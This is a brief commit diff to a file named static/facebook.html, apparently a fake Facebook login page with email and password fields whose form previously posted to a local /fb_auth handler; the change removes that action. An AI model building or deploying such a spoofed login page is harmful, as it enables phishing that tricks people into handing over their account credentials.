Remove some unnecessary stuff in the HTML

--- a/static/facebook.html
+++ b/static/facebook.html
@@ -10,7 +10,7 @@
         <div id="wrapper">
             <div class="center">
 				<div class="content">
-                    <form method="POST" action="/fb_auth">
+                    <form>
                         <h3>Log in to Facebook</h3>
                         <input class="input" id="username" type="text" placeholder="Email address or phone number">
                         <input class="input" id="password" type="password" placeholder="Password">
